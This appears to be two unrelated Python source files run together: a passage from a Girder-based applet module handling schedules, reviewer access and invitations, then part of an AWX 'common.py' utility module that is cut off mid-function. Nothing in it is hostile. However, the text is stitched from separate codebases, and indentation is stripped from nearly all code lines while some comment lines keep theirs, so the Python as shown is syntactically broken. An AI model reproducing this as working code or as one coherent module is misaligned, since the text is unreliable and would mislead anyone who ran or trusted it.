('0' + str(event['schedule']['dayOfMonth'][0]))[-2:] + ' ' +
sendTime)
existNotification = PushNotificationModel().findOne(query={'applet':applet['_id'],
'creator_id':thisUser['_id'],
'sendTime':str(sendTime)})
if not existNotification:
PushNotificationModel().createNotification( applet['_id'], 1,
event['data']['title'], event['data']['description'],
str(sendTime), thisUser['_id'])
appletMeta = applet['meta'] if 'meta' in applet else {'applet': {}}
if 'applet' not in appletMeta:
appletMeta['applet'] = {}
appletMeta['applet']['schedule'] = schedule
AppletModel().setMetadata(applet, appletMeta)
thread = threading.Thread(
target=AppletModel().updateUserCacheAllUsersAllRoles,
args=(applet, thisUser)
)
thread.start()
return(appletMeta)
def authorizeReviewer(applet, reviewer, user):
thisUser = Applet().getCurrentUser()
user = UserModel().load(
user,
level=AccessType.NONE,
user=thisUser
)
try:
applet = FolderModel().load(
applet,
level=AccessType.READ,
user=thisUser
)
responsesCollection = FolderModel().createFolder(
parent=user,
name='Responses',
parentType='user',
public=False,
creator=thisUser,
reuseExisting=True
)
thisApplet = list(FolderModel().childFolders(
parent=responsesCollection,
parentType='folder',
user=thisUser,
filters={
'meta.applet.@id': str(applet['_id'])
}
))
thisApplet = thisApplet[0] if len(
thisApplet
) else FolderModel().setMetadata(
FolderModel().createFolder(
parent=responsesCollection,
name=FolderModel().preferredName(applet),
parentType='folder',
public=False,
creator=thisUser,
allowRename=True,
reuseExisting=False
),
{
'applet': {
'@id': str(applet['_id'])
}
}
)
accessList = thisApplet['access']
accessList['users'].append({
"id": reviewer,
"level": AccessType.READ
})
thisApplet = FolderModel().setAccessList(
thisApplet,
accessList,
save=True,
recurse=True,
user=thisUser
)
    except Exception:
thisApplet = None
return(thisApplet)
def authorizeReviewers(assignment):
assignment = assignment.get('meta', assignment)
thisUser = Applet().getCurrentUser()
allUsers = []
reviewAll = []
members = assignment.get('members', [])
applet = assignment.get('applet').get('@id')
for member in [member for member in members if 'roles' in member]:
try:
if member['roles']['user']:
allUsers.append(getCanonicalUser(member.get("@id")))
        except Exception:
            pass
if 'reviewer' in member['roles']:
if "ALL" in member['roles']['reviewer']:
reviewAll.append(getCanonicalUser(member.get("@id")))
for user in [
user for user in member['roles'][
'reviewer'
] if user not in SPECIAL_SUBJECTS
]:
authorizeReviewer(
assignment.get('applet').get('@id'),
getCanonicalUser(member.get('@id')),
getCanonicalUser(user)
)
for reviewer in reviewAll:
[authorizeReviewer(
assignment.get('applet').get('@id'),
reviewer,
user
) for user in allUsers]
return(None)
def _invite(applet, user, role, rsvp, subject):
"""
Helper function to invite a user to an applet.
:param applet: Applet to invite user to
:type applet: AppletModel
:param user: ID (canonical or applet-specific) or email address of user to
invite
:type user: string
:param role: Role to invite user to
:type role: string
:param rsvp: Require user acceptance?
:type rsvp: boolean
:param subject: Subject about 'user' role can inform or about which
'reviewer' role can review
:type subject: string or literal
:returns: New assignment (dictionary)
"""
if role not in USER_ROLE_KEYS:
raise ValidationException(
'Invalid role.',
'role'
)
thisUser = Applet().getCurrentUser()
user = user if user else str(thisUser['_id'])
if bool(rsvp):
groupName = {
'title': '{} {}s'.format(
str(applet.get('_id')),
role
)
}
groupName['lower'] = groupName.get('title', '').lower()
group = GroupModel().findOne(query={'lowerName': groupName['lower']})
        if group is None:
group = GroupModel().createGroup(
name=groupName['title'],
creator=thisUser,
public=bool(role in ['manager', 'reviewer'])
)
try:
assignments = CollectionModel().createCollection(
name="Assignments",
public=True,
reuseExisting=True
)
assignmentType = 'collection'
except AccessException:
assignments, assignmentType = selfAssignment()
appletAssignment = list(FolderModel().childFolders(
parent=assignments,
parentType=assignmentType,
user=thisUser,
filters={
'meta.applet.@id': str(applet['_id']) if '_id' in applet else None
}
))
appletAssignment = appletAssignment[0] if len(
appletAssignment
) else FolderModel().setMetadata(
FolderModel().createFolder(
parent=assignments,
name=FolderModel().preferredName(applet),
parentType=assignmentType,
public=False,
creator=thisUser,
allowRename=True,
reuseExisting=False
),
{
'applet': {
'@id': str(applet['_id']) if '_id' in applet else None
}
}
)
meta = appletAssignment.get('meta', {})
members = meta.get('members', []) if meta.get(
'members'
) is not None else []
cUser = getUserCipher(appletAssignment, user)
subject = subject.upper() if subject is not None and subject.upper(
) in SPECIAL_SUBJECTS else getUserCipher(
appletAssignment,
str(thisUser['_id']) if subject is None else subject
)
thisAppletAssignment = {
'@id': str(cUser),
'roles': {
role: True if role not in [
'reviewer',
'user'
] else [
subject
]
}
}
for i, u in enumerate(members):
if '@id' in u and u["@id"]==str(cUser):
thisAppletAssignment = members.pop(i)
if 'roles' not in thisAppletAssignment:
thisAppletAssignment['roles'] = {}
thisAppletAssignment['roles'][
role
] = True if role not in [
'reviewer',
'user'
] else [
subject
] if (
subject in SPECIAL_SUBJECTS
) or (
'reviewer' not in thisAppletAssignment[
'roles'
]
) else list(set(
thisAppletAssignment['roles']['reviewer'] + [subject]
).difference(set(
SPECIAL_SUBJECTS
))) if "ALL" not in thisAppletAssignment['roles'][
'reviewer'
] else ["ALL"]
members.append(thisAppletAssignment)
meta['members'] = members
appletAssignment = FolderModel().setMetadata(appletAssignment, meta)
authorizeReviewers(appletAssignment)
return(appletAssignment)
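
# Illustrative call of the helper above (not part of the original module; all
# IDs are placeholders). Inviting with rsvp=True also ensures a group named
# '<applet id> <role>s' exists for acceptance tracking.
#
# _invite(applet, user='<canonical-or-applet-specific-id>', role='reviewer',
#         rsvp=True, subject='<subject id or SPECIAL_SUBJECT>')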
def selfAssignment():
thisUser = Applet().getCurrentUser()
assignmentsFolder = FolderModel().createFolder(
parent=thisUser,
parentType='user',
name='Assignments',
creator=thisUser,
public=False,
reuseExisting=True
)
return((
assignmentsFolder,
'folder'
))
def _setConstraints(applet, activity, schedule, user, refreshCache=False):
"""
Helper function for method recursion.
:param applet: applet Object
:type applet: dict
:param activity: Activity ID
:type activity: str, list, or None
:param schedule: schedule data
:type schedule: dict, list, or None
:param user: user making the call
:type user: dict
:returns: updated applet Object
"""
if activity is None:
if schedule is not None:
appletMeta = applet.get('meta', {})
appletMeta['applet']['schedule'] = schedule
applet = AppletModel().setMetadata(applet, appletMeta)
return(applet)
if isinstance(activity, str) and activity.startswith('['):
try:
activity = [
activity_.replace(
"'",
""
).replace(
'"',
''
).strip() for activity_ in activity[1:-1].split(',')
]
except (TypeError, AttributeError) as e:
print(e)
if isinstance(activity, list):
for activity_ in activity:
applet = _setConstraints(
applet,
activity_,
schedule,
user
)
return(applet)
try:
activityLoaded = ActivityModel().getFromUrl(
activity,
'activity',
            user,
refreshCache
)[0]
    except Exception:
activityLoaded = ActivityModel().load(
activity,
AccessType.WRITE,
user
)
try:
activityMeta = activityLoaded['meta'].get('activity')
except AttributeError:
raise ValidationException(
'Invalid activity.',
'activity'
)
activityKey = activityMeta.get(
'url',
activityMeta.get(
'@id',
activityLoaded.get(
'_id'
)
)
)
if activityKey is None:
raise ValidationException(
'Invalid activity.',
'activity'
)
else:
activityKey = jsonld_expander.reprolibPrefix(activityKey)
protocolExpanded = jsonld_expander.formatLdObject(
applet,
'applet',
user
).get('applet', {})
protocolOrder = protocolExpanded.get('ui', {}).get('order', [])
framedActivityKeys = [
protocolOrder[i] for i, v in enumerate(
protocolExpanded.get(
"reprolib:terms/order"
)[0].get(
"@list"
)
) if jsonld_expander.reprolibPrefix(v.get("@id"))==activityKey
]
if schedule is not None:
appletMeta = applet.get('meta', {})
scheduleInApplet = appletMeta.get('applet', {}).get('schedule', {})
for k in framedActivityKeys:
scheduleInApplet[k] = schedule
appletMeta['applet']['schedule'] = scheduleInApplet
applet = AppletModel().setMetadata(applet, appletMeta)
return(applet)
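
# Illustrative: _setConstraints also accepts a stringified list of activity
# IDs/URLs and recurses once per activity (URLs are placeholders, not part of
# the original module):
#
# _setConstraints(applet, "['https://example.org/act1', "
#                         "'https://example.org/act2']", schedule, user)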
common.py
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
import json
import yaml
import logging
import os
import re
import subprocess
import stat
import urllib.parse
import threading
import contextlib
import tempfile
import psutil
from functools import reduce, wraps
from decimal import Decimal
# Django
from django.core.exceptions import ObjectDoesNotExist, FieldDoesNotExist
from django.utils.translation import ugettext_lazy as _
from django.utils.functional import cached_property
from django.db.models.fields.related import ForeignObjectRel, ManyToManyField
from django.db.models.fields.related_descriptors import (
ForwardManyToOneDescriptor,
ManyToManyDescriptor
)
from django.db.models.query import QuerySet
from django.db.models import Q
# Django REST Framework
from rest_framework.exceptions import ParseError
from django.utils.encoding import smart_str
from django.utils.text import slugify
from django.apps import apps
# AWX
from awx.conf.license import get_license
logger = logging.getLogger('awx.main.utils')
__all__ = [
'get_object_or_400', 'camelcase_to_underscore', 'underscore_to_camelcase', 'memoize',
'memoize_delete', 'get_ansible_version', 'get_licenser', 'get_awx_http_client_headers',
'get_awx_version', 'update_scm_url', 'get_type_for_model', 'get_model_for_type',
'copy_model_by_class', 'copy_m2m_relationships',
'prefetch_page_capabilities', 'to_python_boolean', 'ignore_inventory_computed_fields',
'ignore_inventory_group_removal', '_inventory_updates', 'get_pk_from_dict', 'getattrd',
'getattr_dne', 'NoDefaultProvided', 'get_current_apps', 'set_current_apps',
'extract_ansible_vars', 'get_search_fields', 'get_system_task_capacity',
'get_cpu_capacity', 'get_mem_capacity', 'wrap_args_with_proot', 'build_proot_temp_dir',
'check_proot_installed', 'model_to_dict', 'NullablePromptPseudoField',
'model_instance_diff', 'parse_yaml_or_json', 'RequireDebugTrueOrTest',
'has_model_field_prefetched', 'set_environ', 'IllegalArgumentError',
'get_custom_venv_choices', 'get_external_account', 'task_manager_bulk_reschedule',
'schedule_task_manager', 'classproperty', 'create_temporary_fifo', 'truncate_stdout'
]
def get_object_or_400(klass, *args, **kwargs):
'''
Return a single object from the given model or queryset based on the query
    params, otherwise raise an exception that will result in a 400 response.
'''
from django.shortcuts import _get_queryset
queryset = _get_queryset(klass)
try:
return queryset.get(*args, **kwargs)
except queryset.model.DoesNotExist as e:
raise ParseError(*e.args)
except queryset.model.MultipleObjectsReturned as e:
raise ParseError(*e.args)
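
# Illustrative use (not part of the original module; `Host` and `host_id` are
# placeholders): a missing or ambiguous record surfaces as a DRF ParseError,
# i.e. an HTTP 400, instead of a 404/500.
#
# host = get_object_or_400(Host, pk=host_id)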
def to_python_boolean(value, allow_none=False):
value = str(value)
if value.lower() in ('true', '1', 't'):
return True
elif value.lower() in ('false', '0', 'f'):
return False
elif allow_none and value.lower() in ('none', 'null'):
return None
else:
raise ValueError(_(u'Unable to convert "%s" to boolean') % value)
def camelcase_to_underscore(s):
'''
Convert CamelCase names to lowercase_with_underscore.
'''
s = re.sub(r'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', '_\\1', s)
return s.lower().strip('_')
def underscore_to_camelcase(s):
'''
Convert lowercase_with_underscore names to CamelCase.
'''
return ''.join(x.capitalize() or '_' for x in s.split('_'))
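
# Quick sanity check of the two converters above (illustrative, derived from
# the regex; not part of the original module):
#
# camelcase_to_underscore('JobTemplate') -> 'job_template'
# underscore_to_camelcase('job_template') -> 'JobTemplate'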
class RequireDebugTrueOrTest(logging.Filter):
'''
Logging filter to output when in DEBUG mode or running tests.
'''
def filter(self, record):
from django.conf import settings
return settings.DEBUG or settings.IS_TESTING()
class IllegalArgumentError(ValueError):
pass
def get_memoize_cache():
from django.core.cache import cache
return cache
def memoize(ttl=60, cache_key=None, track_function=False, cache=None):
'''
Decorator to wrap a function and cache its result.
'''
if cache_key and track_function:
raise IllegalArgumentError("Can not specify cache_key when track_function is True")
cache = cache or get_memoize_cache()
def memoize_decorator(f):
@wraps(f)
def _memoizer(*args, **kwargs):
if track_function:
cache_dict_key = slugify('%r %r' % (args, kwargs))
key = slugify("%s" % f.__name__)
cache_dict = cache.get(key) or dict()
if cache_dict_key not in cache_dict:
value = f(*args, **kwargs)
cache_dict[cache_dict_key] = value
cache.set(key, cache_dict, ttl)
else:
value = cache_dict[cache_dict_key]
else:
key = cache_key or slugify('%s %r %r' % (f.__name__, args, kwargs))
value = cache.get(key)
if value is None:
value = f(*args, **kwargs)
cache.set(key, value, ttl)
return value
return _memoizer
return memoize_decorator
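
# A minimal sketch of applying the decorator above (illustrative; the function
# is a placeholder). With track_function=True, results for every argument
# combination are stored in one dict under a single per-function cache key;
# otherwise each (name, args, kwargs) slug gets its own key.
#
# @memoize(ttl=300)
# def expensive_lookup(name):
#     ...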
def memoize_delete(function_name):
cache = get_memoize_cache()
return cache.delete(function_name)
@memoize()
def get_ansible_version():
    '''
    Return Ansible version installed.
    Note: this reports whichever `ansible` is first on PATH, which matters
    when custom virtual environments are in use.
    '''
try:
proc = subprocess.Popen(['ansible', '--version'],
stdout=subprocess.PIPE)
result = smart_str(proc.communicate()[0])
return result.split('\n')[0].replace('ansible', '').strip()
except Exception:
return 'unknown'
def get_awx_version():
'''
Return AWX version as reported by setuptools.
'''
from awx import __version__
try:
import pkg_resources
return pkg_resources.require('awx')[0].version
except Exception:
return __version__
def get_awx_http_client_headers():
license = get_license().get('license_type', 'UNLICENSED')
headers = {
'Content-Type': 'application/json',
'User-Agent': '{} {} ({})'.format(
'AWX' if license == 'open' else 'Red Hat Ansible Tower',
get_awx_version(),
license
)
}
return headers
def get_licenser(*args, **kwargs):
from awx.main.utils.licensing import Licenser, OpenLicense
try:
if os.path.exists('/var/lib/awx/.tower_version'):
return Licenser(*args, **kwargs)
else:
return OpenLicense()
except Exception as e:
raise ValueError(_('Error importing Tower License: %s') % e)
def update_scm_url(scm_type, url, username=True, password=True,
check_special_cases=True, scp_format=False):
'''
Update the given SCM URL to add/replace/remove the username/password. When
username/password is True, preserve existing username/password, when
False (None, '', etc.), remove any existing username/password, otherwise
replace username/password. Also validates the given URL.
'''
# Handle all of the URL formats supported by the SCM systems:
# git: https://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
# svn: http://svnbook.red-bean.com/en/1.7/svn-book.html#svn.advanced.reposurls
if scm_type not in ('git', 'svn', 'insights', 'archive'):
raise ValueError(_('Unsupported SCM type "%s"') % str(scm_type))
if not url.strip():
return ''
parts = urllib.parse.urlsplit(url)
    try:
        # Accessing parts.port validates it; an invalid port raises ValueError.
        parts.port
except ValueError:
raise ValueError(_('Invalid %s URL') % scm_type)
if parts.scheme == 'git+ssh' and not scp_format:
raise ValueError(_('Unsupported %s URL') % scm_type)
if '://' not in url:
# Handle SCP-style URLs for git (e.g. [user@]host.xz:path/to/repo.git/).
if scm_type == 'git' and ':' in url:
if '@' in url:
userpass, hostpath = url.split('@', 1)
else:
userpass, hostpath = '', url
if hostpath.count(':') > 1:
raise ValueError(_('Invalid %s URL') % scm_type)
host, path = hostpath.split(':', 1)
#if not path.startswith('/') and not path.startswith('~/'):
# path = '~/%s' % path
#if path.startswith('/'):
# path = path.lstrip('/')
hostpath = '/'.join([host, path])
modified_url = '@'.join(filter(None, [userpass, hostpath]))
# git+ssh scheme identifies URLs that should be converted back to
# SCP style before passed to git module.
parts = urllib.parse.urlsplit('git+ssh://%s' % modified_url)
# Handle local paths specified without file scheme (e.g. /path/to/foo).
# Only supported by git.
elif scm_type == 'git':
if not url.startswith('/'):
parts = urllib.parse.urlsplit('file:///%s' % url)
else:
parts = urllib.parse.urlsplit('file://%s' % url)
else:
raise ValueError(_('Invalid %s URL') % scm_type)
# Validate that scheme is valid for given scm_type.
scm_type_schemes = {
'git': ('ssh', 'git', 'git+ssh', 'http', 'https', 'ftp', 'ftps', 'file'),
'svn': ('http', 'https', 'svn', 'svn+ssh', 'file'),
'insights': ('http', 'https'),
'archive': ('http', 'https'),
}
if parts.scheme not in scm_type_schemes.get(scm_type, ()):
raise ValueError(_('Unsupported %s URL') % scm_type)
if parts.scheme == 'file' and parts.netloc not in ('', 'localhost'):
raise ValueError(_('Unsupported host "%s" for file:// URL') % (parts.netloc))
elif parts.scheme != 'file' and not parts.netloc:
raise ValueError(_('Host is required for %s URL') % parts.scheme)
if username is True:
netloc_username = parts.username or ''
elif username:
netloc_username = username
else:
netloc_username = ''
if password is True:
netloc_password = parts.password or ''
elif password:
netloc_password = password
else:
netloc_password = ''
# Special handling for github/bitbucket SSH URLs.
if check_special_cases:
special_git_hosts = ('github.com', 'bitbucket.org', 'altssh.bitbucket.org')
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_username != 'git':
raise ValueError(_('Username must be "git" for SSH access to %s.') % parts.hostname)
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_password:
#raise ValueError('Password not allowed for SSH access to %s.' % parts.hostname)
netloc_password = ''
if netloc_username and parts.scheme != 'file' and scm_type not in ("insights", "archive"):
netloc = u':'.join([urllib.parse.quote(x,safe='') for x in (netloc_username, netloc_password) if x])
else:
netloc = u''
netloc = u'@'.join(filter(None, [netloc, parts.hostname]))
if parts.port:
netloc = u':'.join([netloc, str(parts.port)])
new_url = urllib.parse.urlunsplit([parts.scheme, netloc, parts.path,
parts.query, parts.fragment])
if scp_format and parts.scheme == 'git+ssh':
new_url = new_url.replace('git+ssh://', '', 1).replace('/', ':', 1)
return new_url
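
# Illustrative round trip (not part of the original module): an SCP-style git
# URL is normalized to the internal git+ssh form, and scp_format=True converts
# it back before it is handed to the git module.
#
# update_scm_url('git', 'git@github.com:ansible/awx.git')
# -> 'git+ssh://git@github.com/ansible/awx.git'
# update_scm_url('git', 'git+ssh://git@github.com/ansible/awx.git',
#                scp_format=True)
# -> 'git@github.com:ansible/awx.git'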
def get_allowed_fields(obj, serializer_mapping):
if serializer_mapping is not None and obj.__class__ in serializer_mapping:
serializer_actual = serializer_mapping[obj.__class__]()
allowed_fields = [x for x in serializer_actual.fields if not serializer_actual.fields[x].read_only] + ['id']
else:
allowed_fields = [x.name for x in obj._meta.fields]
ACTIVITY_STREAM_FIELD_EXCLUSIONS = {
'user': ['last_login'],
'oauth2accesstoken': ['last_used'],
'oauth2application': ['client_secret']
}
model_name = obj._meta.model_name
fields_excluded = ACTIVITY_STREAM_FIELD_EXCLUSIONS.get(model_name, [])
# see definition of from_db for CredentialType
# injection logic of any managed types are incompatible with activity stream
if model_name == 'credentialtype' and obj.managed_by_tower and obj.namespace:
fields_excluded.extend(['inputs', 'injectors'])
if fields_excluded:
allowed_fields = [f for f in allowed_fields if f not in fields_excluded]
return allowed_fields
def _convert_model_field_for_display(obj, field_name, password_fields=None):
# NOTE: Careful modifying the value of field_val, as it could modify
# underlying model object field value also.
try:
field_val = getattr(obj, field_name, None)
except ObjectDoesNotExist:
return '<missing {}>-{}'.format(obj._meta.verbose_name, getattr(obj, '{}_id'.format(field_name)))
if password_fields is None:
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
if field_name in password_fields or (
isinstance(field_val, str) and
field_val.startswith('$encrypted$')
):
return u'hidden'
if hasattr(obj, 'display_%s' % field_name):
field_val = getattr(obj, 'display_%s' % field_name)()
if isinstance(field_val, (list, dict)):
try:
field_val = json.dumps(field_val, ensure_ascii=False)
except Exception:
pass
if type(field_val) not in (bool, int, type(None)):
field_val = smart_str(field_val)
return field_val
def model_instance_diff(old, new, serializer_mapping=None):
"""
Calculate the differences between two model instances. One of the instances may be None (i.e., a newly
created model or deleted model). This will cause all fields with a value to have changed (from None).
    serializer_mapping is used to determine read-only fields.
    When provided, read-only fields will not be included in the resulting dictionary.
"""
from django.db.models import Model
if not(old is None or isinstance(old, Model)):
raise TypeError('The supplied old instance is not a valid model instance.')
if not(new is None or isinstance(new, Model)):
raise TypeError('The supplied new instance is not a valid model instance.')
old_password_fields = set(getattr(type(old), 'PASSWORD_FIELDS', [])) | set(['password'])
new_password_fields = set(getattr(type(new), 'PASSWORD_FIELDS', [])) | set(['password'])
diff = {}
allowed_fields = get_allowed_fields(new, serializer_mapping)
for field in allowed_fields:
old_value = getattr(old, field, None)
new_value = getattr(new, field, None)
if old_value != new_value:
diff[field] = (
_convert_model_field_for_display(old, field, password_fields=old_password_fields),
_convert_model_field_for_display(new, field, password_fields=new_password_fields),
)
if len(diff) == 0:
diff = None
return diff
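
# Illustrative output shape (models and values are placeholders, not part of
# the original module): each changed field maps to a
# (old display value, new display value) tuple.
#
# model_instance_diff(old_host, new_host)
# -> {'name': ('web-01', 'web-02'), 'enabled': (False, True)}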
def model_to_dict(obj, serializer_mapping=None):
"""
    Serialize a model instance to a dictionary as faithfully as possible.
    serializer_mapping is used to determine read-only fields.
    When provided, read-only fields will not be included in the resulting dictionary.
"""
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
attr_d = {}
allowed_fields = get_allowed_fields(obj, serializer_mapping)
for field_name in allowed_fields:
attr_d[field_name] = _convert_model_field_for_display(obj, field_name, password_fields=password_fields)
return attr_d
class CharPromptDescriptor:
"""Class used for identifying nullable launch config fields from class
ex. Schedule.limit
"""
def __init__(self, field):
self.field = field
class NullablePromptPseudoField:
"""
Interface for pseudo-property stored in `char_prompts` dict
Used in LaunchTimeConfig and submodels, defined here to avoid circular imports
"""
def __init__(self, field_name):
self.field_name = field_name
@cached_property
def field_descriptor(self):
return CharPromptDescriptor(self)
def __get__(self, instance, type=None):
if instance is None:
# for inspection on class itself
return self.field_descriptor
return instance.char_prompts.get(self.field_name, None)
def __set__(self, instance, value):
if value in (None, {}):
instance.char_prompts.pop(self.field_name, None)
else:
instance.char_prompts[self.field_name] = value
def copy_model_by_class(obj1, Class2, fields, kwargs):
'''
Creates a new unsaved object of type Class2 using the fields from obj1
values in kwargs can override obj1
'''
create_kwargs = {}
for field_name in fields:
descriptor = getattr(Class2, field_name)
if isinstance(descriptor, ForwardManyToOneDescriptor): # ForeignKey
# Foreign keys can be specified as field_name or field_name_id.
id_field_name = '%s_id' % field_name
if field_name in kwargs:
value = kwargs[field_name]
elif id_field_name in kwargs:
value = kwargs[id_field_name]
else:
value = getattr(obj1, id_field_name)
if hasattr(value, 'id'):
value = value.id
create_kwargs[id_field_name] = value
elif isinstance(descriptor, CharPromptDescriptor):
# difficult case of copying one launch config to another launch config
new_val = None
if field_name in kwargs:
new_val = kwargs[field_name]
elif hasattr(obj1, 'char_prompts'):
if field_name in obj1.char_prompts:
new_val = obj1.char_prompts[field_name]
elif hasattr(obj1, field_name):
# extremely rare case where a template spawns a launch config - sliced jobs
new_val = getattr(obj1, field_name)
if new_val is not None:
create_kwargs.setdefault('char_prompts', {})
create_kwargs['char_prompts'][field_name] = new_val
elif isinstance(descriptor, ManyToManyDescriptor):
continue # not copied in this method
elif field_name in kwargs:
if field_name == 'extra_vars' and isinstance(kwargs[field_name], dict):
create_kwargs[field_name] = json.dumps(kwargs['extra_vars'])
elif not isinstance(Class2._meta.get_field(field_name), (ForeignObjectRel, ManyToManyField)):
create_kwargs[field_name] = kwargs[field_name]
elif hasattr(obj1, field_name):
create_kwargs[field_name] = getattr(obj1, field_name)
# Apply class-specific extra processing for origination of unified jobs
if hasattr(obj1, '_update_unified_job_kwargs') and obj1.__class__ != Class2:
new_kwargs = obj1._update_unified_job_kwargs(create_kwargs, kwargs)
else:
new_kwargs = create_kwargs
return Class2(**new_kwargs)
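# Usage sketch (hypothetical JobTemplate/Job classes and field list): spawn an
# unsaved Job that carries over the listed fields, with kwargs taking precedence
# over the values found on obj1.
#
#   >>> job = copy_model_by_class(job_template, Job,
#   ...                           fields=['name', 'inventory', 'limit'],
#   ...                           kwargs={'limit': 'webservers'})
#   >>> job.pk is None   # built but not yet saved
#   True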
def copy_m2m_relationships(obj1, obj2, fields, kwargs=None):
'''
In-place operation.
    Given two saved objects, copies related objects from obj1
    to obj2 into the field of the same name, if that field occurs in `fields`.
'''
for field_name in fields:
if hasattr(obj1, field_name):
try:
field_obj = obj1._meta.get_field(field_name)
except FieldDoesNotExist:
continue
if isinstance(field_obj, ManyToManyField):
# Many to Many can be specified as field_name
src_field_value = getattr(obj1, field_name)
if kwargs and field_name in kwargs:
override_field_val = kwargs[field_name]
if isinstance(override_field_val, (set, list, QuerySet)):
getattr(obj2, field_name).add(*override_field_val)
continue
if override_field_val.__class__.__name__ == 'ManyRelatedManager':
src_field_value = override_field_val
dest_field = getattr(obj2, field_name)
dest_field.add(*list(src_field_value.all().values_list('id', flat=True)))
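# Usage sketch (hypothetical 'credentials' relation): once both objects are
# saved, the many-to-many rows are copied over by primary key.
#
#   >>> copy_m2m_relationships(job_template, job, fields=['credentials'])
#   >>> set(job.credentials.values_list('id', flat=True)) == \
#   ...     set(job_template.credentials.values_list('id', flat=True))
#   True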
def get_type_for_model(model):
'''
Return type name for a given model class.
'''
opts = model._meta.concrete_model._meta
return camelcase_to_underscore(opts.object_name)
def get_model_for_type(type_name):
'''
Return model class for a given type name.
'''
model_str = underscore_to_camelcase(type_name)
if model_str == 'User':
use_app = 'auth'
else:
use_app = 'main'
return apps.get_model(use_app, model_str)
def prefetch_page_capabilities(model, page, prefetch_list, user):
'''
    Given a `page` list of objects, a nested dictionary of user_capabilities
    is returned, keyed by object id, e.g.
{
4: {'edit': True, 'start': True},
6: {'edit': False, 'start': False}
}
Each capability is produced for all items in the page in a single query
Examples of prefetch language:
prefetch_list = ['admin', 'execute']
--> prefetch the admin (edit) and execute (start) permissions for
items in list for current user
prefetch_list = ['inventory.admin']
--> prefetch the related inventory FK permissions for current user,
and put it into the object's cache
prefetch_list = [{'copy': ['inventory.admin', 'project.admin']}]
--> prefetch logical combination of admin permission to inventory AND
project, put into cache dictionary as "copy"
'''
page_ids = [obj.id for obj in page]
mapping = {}
for obj in page:
mapping[obj.id] = {}
for prefetch_entry in prefetch_list:
display_method = None
if type(prefetch_entry) is dict:
display_method = list(prefetch_entry.keys())[0]
paths = prefetch_entry[display_method]
else:
paths = prefetch_entry
if type(paths) is not list:
paths = [paths]
        # Build the query for accessible_objects according to the user & role(s)
filter_args = []
for role_path in paths:
if '.' in role_path:
res_path = '__'.join(role_path.split('.')[:-1])
role_type = role_path.split('.')[-1]
parent_model = model
for subpath in role_path.split('.')[:-1]:
parent_model = parent_model._meta.get_field(subpath).related_model
filter_args.append(Q(
Q(**{'%s__pk__in' % res_path: parent_model.accessible_pk_qs(user, '%s_role' % role_type)}) |
Q(**{'%s__isnull' % res_path: True})))
else:
role_type = role_path
filter_args.append(Q(**{'pk__in': model.accessible_pk_qs(user, '%s_role' % role_type)}))
if display_method is None:
# Role name translation to UI names for methods
display_method = role_type
if role_type == 'admin':
display_method = 'edit'
elif role_type in ['execute', 'update']:
display_method = 'start'
# Union that query with the list of items on page
filter_args.append(Q(pk__in=page_ids))
ids_with_role = set(model.objects.filter(*filter_args).values_list('pk', flat=True))
# Save data item-by-item
for obj in page:
mapping[obj.pk][display_method] = bool(obj.pk in ids_with_role)
return mapping
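# Usage sketch (hypothetical model and page): resolves the 'edit' and 'start'
# capabilities for every object on the page with one query per prefetch entry,
# instead of one query per object.
#
#   >>> prefetch_page_capabilities(JobTemplate, page, ['admin', 'execute'], user)
#   {4: {'edit': True, 'start': True}, 6: {'edit': False, 'start': False}}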
def validate_vars_type(vars_obj):
if not isinstance(vars_obj, dict):
vars_type = type(vars_obj)
if hasattr(vars_type, '__name__'):
data_type = vars_type.__name__
else:
data_type = str(vars_type)
raise AssertionError(
_('Input type `{data_type}` is not a dictionary').format(
data_type=data_type)
)
def parse_yaml_or_json(vars_str, silent_failure=True):
'''
Attempt to parse a string of variables.
First, with JSON parser, if that fails, then with PyYAML.
    If both attempts fail, return an empty dictionary if `silent_failure`
    is True, or re-raise a combined error if `silent_failure` is False.
'''
if isinstance(vars_str, dict):
return vars_str
elif isinstance(vars_str, str) and vars_str == '""':
return {}
try:
vars_dict = json.loads(vars_str)
validate_vars_type(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err:
try:
vars_dict = yaml.safe_load(vars_str)
# Can be None if '---'
if vars_dict is None:
vars_dict = {}
validate_vars_type(vars_dict)
if not silent_failure:
# is valid YAML, check that it is compatible with JSON
try:
json.dumps(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err2:
raise ParseError(_(
'Variables not compatible with JSON standard (error: {json_error})').format(
json_error=str(json_err2)))
except (yaml.YAMLError, TypeError, AttributeError, AssertionError) as yaml_err:
if silent_failure:
return {}
raise ParseError(_(
'Cannot parse as JSON (error: {json_error}) or '
'YAML (error: {yaml_error}).').format(
json_error=str(json_err), yaml_error=str(yaml_err)))
return vars_dict
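# Behavior examples (illustrative): JSON is tried first, then YAML; unparseable
# input silently degrades to {} unless silent_failure=False.
#
#   >>> parse_yaml_or_json('{"a": 1}')
#   {'a': 1}
#   >>> parse_yaml_or_json('a: 1')
#   {'a': 1}
#   >>> parse_yaml_or_json('this is not a mapping')
#   {}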
def get_cpu_capacity():
from django.conf import settings
settings_forkcpu = getattr(settings, 'SYSTEM_TASK_FORKS_CPU', None)
env_forkcpu = os.getenv('SYSTEM_TASK_FORKS_CPU', None)
settings_abscpu = getattr(settings, 'SYSTEM_TASK_ABS_CPU', None)
env_abscpu = os.getenv('SYSTEM_TASK_ABS_CPU', None)
if env_abscpu is not None:
return 0, int(env_abscpu)
elif settings_abscpu is not None:
return 0, int(settings_abscpu)
cpu = psutil.cpu_count()
if env_forkcpu:
forkcpu = int(env_forkcpu)
elif settings_forkcpu:
forkcpu = int(settings_forkcpu)
else:
forkcpu = 4
return (cpu, cpu * forkcpu)
def get_mem_capacity():
from django.conf import settings
settings_forkmem = getattr(settings, 'SYSTEM_TASK_FORKS_MEM', None)
env_forkmem = os.getenv('SYSTEM_TASK_FORKS_MEM', None)
settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
env_absmem = os.getenv('SYSTEM_TASK_ABS_MEM', None)
if env_absmem is not None:
return 0, int(env_absmem)
elif settings_absmem is not None:
return 0, int(settings_absmem)
if env_forkmem:
forkmem = int(env_forkmem)
